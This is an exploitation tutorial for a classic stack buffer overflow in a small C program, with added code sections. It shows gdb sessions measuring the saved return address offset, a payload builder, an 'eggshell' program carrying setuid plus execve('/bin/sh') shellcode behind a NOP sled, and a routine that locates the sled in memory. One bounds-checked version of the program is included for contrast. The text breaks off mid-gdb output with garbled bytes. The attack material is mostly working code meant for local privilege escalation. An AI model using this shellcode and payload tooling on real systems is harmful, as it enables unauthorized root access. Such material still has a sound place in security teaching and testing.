zbeng

Start of paper


---------- start of vul.c --------------

/* vul.c by _6mO_HaCk */

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strcpy() */

int main(int argc, char * argv[])
{
    char buffer[10];

    if(argc < 2)
    {
        printf("Usage : %s buffer\n", argv[0]);
        exit(0);
    }

    /* no length check: an argv[1] longer than 9 bytes runs past buffer */
    strcpy(buffer,argv[1]);
    printf("ur buffer : %s", buffer);
    return 0;
}

----------- end of vul.c ---------------
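For contrast, and as an added example that is not part of the original tutorial: the same program with the copy bounds-checked. Everything that follows on this page exploits the unchecked version above. The names copy_checked and fits_in_buffer are introduced here for illustration.

```c
/* Bounds-checked version of the copy in vul.c.
 * Added example, not part of the original tutorial. */
#include <stdio.h>
#include <string.h>

#define BUFSZ 10   /* same size as `char buffer[10]` in vul.c */

/* Copy src into dst (capacity dstsz) only if it fits together with its
 * terminating NUL. Returns 0 on success, -1 if the input would overflow;
 * on failure dst is left as an empty string so a caller cannot use stale data. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsz) {          /* n == dstsz would leave no room for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* n bytes plus the terminating NUL */
    return 0;
}

/* The decision vul.c never makes: does this argument fit in a 10-byte buffer? */
int fits_in_buffer(const char *arg)
{
    char buffer[BUFSZ];
    return copy_checked(buffer, sizeof buffer, arg) == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUFSZ];

    if (argc < 2) {
        printf("Usage : %s buffer\n", argv[0]);
        return 1;
    }
    if (copy_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("ur buffer : %s\n", buffer);
    return 0;
}
```

Note the comparison is n >= dstsz, not n > dstsz: ten characters need eleven bytes once the terminator is counted, which is the classic off-by-one that a "fixed" program often keeps.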

Let's try to overflow it:

[simo@localhost lab]$ gcc vul.c -o vul
[simo@localhost lab]$ ./vul `perl -e 'print "A" x 20'`
ur buffer : AAAAAAAAAAAAAAAAAAAA

20 bytes and still no crash; let's feed it a bigger input:

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 30'`

Segmentation fault (core dumped)

We did it, we were able to overflow it: the segmentation fault means the copy ran past the buffer and corrupted something the program needed.

Let's see what happened, using our favourite debugger, gdb:

[simo@localhost lab]$ gdb -c core ./vul
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x40003e40 in process_envvars (modep=Cannot access memory at address 0x41414149
) at rtld.c:1463
1463    rtld.c: No such file or directory.
        in rtld.c
(gdb) info reg eip
eip            0x40003e40       0x40003e40
(gdb) info reg ebp
ebp            0x41414141       0x41414141

As you can see, this time we only managed to overwrite ebp (the extended base pointer, i.e. the saved frame pointer) with 0x41414141; eip (the extended instruction pointer) still points into the dynamic linker (0x40003e40, inside process_envvars), not at anything we supplied. The crash is a side effect of the trashed frame pointer: the argument gdb fails to read at 0x41414149 is exactly ebp+8, the first argument slot of a frame whose ebp is 0x41414141. It seems we still need a bigger buffer.

Let's retry with a bigger input:

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'`
Segmentation fault (core dumped)
[simo@localhost lab]$ gdb -c core ./vul
Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) info reg ebp
ebp            0x41414141       0x41414141
(gdb) info reg eip
eip            0x41414141       0x41414141
(gdb) q

This time we did it: with 32 bytes we overwrote both ebp and eip with our new address 0x41414141, where 0x41 is the hex value of the ASCII character "A" :)

Putting the two runs together: the saved return address sits 28 bytes into our input (bytes 28 to 31) and the saved ebp just before it (bytes 24 to 27). Whatever we write into those last four bytes is where main() will return.
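Turning those measurements into a payload, as an added example that is not from the original tutorial: the builder below pads 28 bytes and then appends a 4-byte return address in x86 little-endian order, and refuses any address containing a 0x00 byte, because strcpy() would stop copying there and leave the saved eip only partly overwritten, exactly the kind of half-result the 30-byte run produced. The address 0xbffff574 used in main() is just a stack address in the range gdb shows on this page, used as a placeholder; the real target is the address of the NOP sled found in the next steps. The function names are introduced here for illustration.

```c
/* Builds the overflow string for vul.c from the offsets measured in gdb above.
 * Added example, not part of the original tutorial. The constants come from
 * the page: 30 bytes clobbered only the saved ebp, 32 bytes clobbered both
 * the saved ebp and the saved eip, so the saved eip starts at offset 28. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_OFFSET 28   /* offset of the saved return address in the overflow */

/* Write the payload into out: RET_OFFSET filler bytes followed by ret_addr in
 * little-endian order (x86). Returns the payload length, or -1 if out is too
 * small or the address contains a 0x00 byte (strcpy() would stop there and
 * the saved eip would only be partially overwritten). */
int build_payload(uint32_t ret_addr, unsigned char *out, size_t outsz)
{
    if (outsz < RET_OFFSET + 4 + 1)          /* payload plus terminating NUL */
        return -1;
    for (int i = 0; i < 4; i++)
        if (((ret_addr >> (8 * i)) & 0xff) == 0)
            return -1;
    memset(out, 'A', RET_OFFSET);             /* filler up to the saved eip */
    for (int i = 0; i < 4; i++)               /* least significant byte first */
        out[RET_OFFSET + i] = (ret_addr >> (8 * i)) & 0xff;
    out[RET_OFFSET + 4] = '\0';
    return RET_OFFSET + 4;
}

/* The saved eip is fully under our control only from 32 bytes on,
 * which is what the two gdb sessions above showed. */
int eip_fully_overwritten(size_t payload_len)
{
    return payload_len >= RET_OFFSET + 4;
}

/* Helper for checking: the byte at index idx of the payload for ret_addr,
 * or -1 if the payload cannot be built or idx is past its end. */
int payload_byte_at(uint32_t ret_addr, size_t idx)
{
    unsigned char buf[RET_OFFSET + 5];
    int n = build_payload(ret_addr, buf, sizeof buf);
    if (n < 0 || idx >= (size_t)n)
        return -1;
    return buf[idx];
}

int main(void)
{
    unsigned char payload[64];
    /* placeholder address from the stack range seen in gdb on this page */
    int n = build_payload(0xbffff574, payload, sizeof payload);
    if (n < 0) {
        fputs("address contains a NUL byte or buffer too small\n", stderr);
        return 1;
    }
    /* print it as a perl one-liner in the style used above, ready to paste */
    printf("perl -e 'print \"A\" x %d . \"", RET_OFFSET);
    for (int i = RET_OFFSET; i < n; i++)
        printf("\\x%02x", payload[i]);
    printf("\"'\n");
    return 0;
}
```

Since the address lives in the last four bytes of the string, any 0x00 in it ends the copy early; addresses near the top of the stack (0xbfffxxxx) avoid this, which is one reason the eggshell is placed in the environment.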

The next step is to find the return address for our shellcode. For that we load an eggshell (a block of NOPs with the shellcode at its end) into the environment, overflow the vulnerable program again and look for the shellcode's address in the core dump.

A simple eggshell that I have written, with setuid shellcode:

-------------------------- start eggshell.c ----------------------------

#include <stdio.h>
#include <stdlib.h>   /* setenv(), system() */
#include <string.h>   /* memset(), memcpy(), strlen() */

#define NOP 0x90      /* our nops (no operations) */
#define EGGSIZE 512   /* NOP sled plus shellcode */

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() (not mine) */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; /* ends in execve("/bin/sh") */

int main(void)
{
    char eggshell[EGGSIZE + 1];   /* one extra byte for the NUL setenv() needs */

    puts("eggshell by _6mO_HaCk, loaded into environment");
    /* fill with NOPs, put the shellcode at the very end, terminate the string */
    memset(eggshell, NOP, EGGSIZE);
    memcpy(&eggshell[EGGSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
    eggshell[EGGSIZE] = '\0';
    setenv("EGG", eggshell, 1);
    system("/bin/bash");          /* spawn a shell that inherits EGG */
    return(0);
}

--------------------------- end eggshell.c -----------------------------

[simo@localhost lab]$ gcc eggshell.c -o eggshell; ./eggshell
eggshell by _6mO_HaCk, loaded into environment
[simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'`
Segmentation fault (core dumped)
[simo@localhost lab]$ gdb -c core ./vul
Core was generated by `./vul'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) x/s $esp
0xbffff570:     ""
(gdb)
0xbffff571:     ""
(gdb)
0xbffff572:     ""
(gdb)
0xbffff573:     ""
(gdb)
0xbffff574:     "Üõÿ¿äõÿ¿ö202
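The session above walks the stack one string at a time with x/s, looking for the block of NOPs that is the eggshell. The function below does that search over a raw copy of the stack bytes. It is an added example, not part of the original tutorial: it looks for the longest run of 0x90 immediately followed by the first bytes of the shellcode, and returns an address in the middle of that run, so that a return address that is off by a few bytes still lands on a NOP. The stack snapshot it runs on is constructed inline, the base address 0xbffff400 is a made-up value in the range gdb shows on this page, and the function names are introduced here for illustration.

```c
/* Finds the eggshell in a snapshot of the target's stack, the job the
 * x/s walk above does by hand. Added example, not from the original tutorial. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90
#define MIN_SLED 64   /* ignore short accidental runs of 0x90 */

/* Scan mem (len bytes, mapped at address base) for the longest run of NOPs
 * that is immediately followed by the first sclen bytes of the shellcode.
 * Returns an address in the middle of that run, or 0 if nothing qualifies. */
uintptr_t find_egg(const unsigned char *mem, size_t len, uintptr_t base,
                   const unsigned char *sc, size_t sclen)
{
    size_t best_start = 0, best_len = 0;
    size_t i = 0;
    while (i < len) {
        if (mem[i] != NOP) { i++; continue; }
        size_t start = i;
        while (i < len && mem[i] == NOP)
            i++;
        size_t run = i - start;
        /* the sled only counts if the shellcode starts right after it */
        if (run >= MIN_SLED && run > best_len &&
            len - i >= sclen && memcmp(mem + i, sc, sclen) == 0) {
            best_start = start;
            best_len = run;
        }
    }
    if (best_len == 0)
        return 0;
    return base + best_start + best_len / 2;
}

/* First 8 bytes of the shellcode in eggshell.c above (the setuid() part). */
static const unsigned char sc_prefix[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80";

/* Constructed sample: a 1 KiB "stack" with filler, a decoy run of NOPs that
 * is too short, and the eggshell.c layout (NOPs, then shellcode) at offset 300.
 * Returns the offset find_egg() is expected to pick. */
#define SAMPLE_BASE 0xbffff400u   /* made-up base in the range gdb shows above */
#define SAMPLE_LEN  1024
#define EGG_AT      300
#define EGG_SIZE    512

size_t build_sample(unsigned char *mem)
{
    size_t sclen = sizeof sc_prefix - 1;
    size_t sled = EGG_SIZE - sclen;           /* 504 NOPs before the shellcode */
    memset(mem, 'A', SAMPLE_LEN);             /* filler, like our overflow string */
    memset(mem + 100, NOP, 16);               /* decoy: too short, no shellcode after it */
    memset(mem + EGG_AT, NOP, sled);
    memcpy(mem + EGG_AT + sled, sc_prefix, sclen);
    return EGG_AT + sled / 2;
}

uintptr_t demo(void)
{
    unsigned char mem[SAMPLE_LEN];
    build_sample(mem);
    return find_egg(mem, SAMPLE_LEN, SAMPLE_BASE, sc_prefix, sizeof sc_prefix - 1);
}

int main(void)
{
    uintptr_t addr = demo();
    if (addr == 0) {
        puts("egg not found");
        return 1;
    }
    printf("jump to %#lx (middle of the NOP sled)\n", (unsigned long)addr);
    return 0;
}
```

Requiring the shellcode bytes right after the run is what separates the egg from the 0x90 bytes that turn up elsewhere in memory; aiming at the middle of the sled is why the eggshell above spends 400 bytes on NOPs in the first place.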
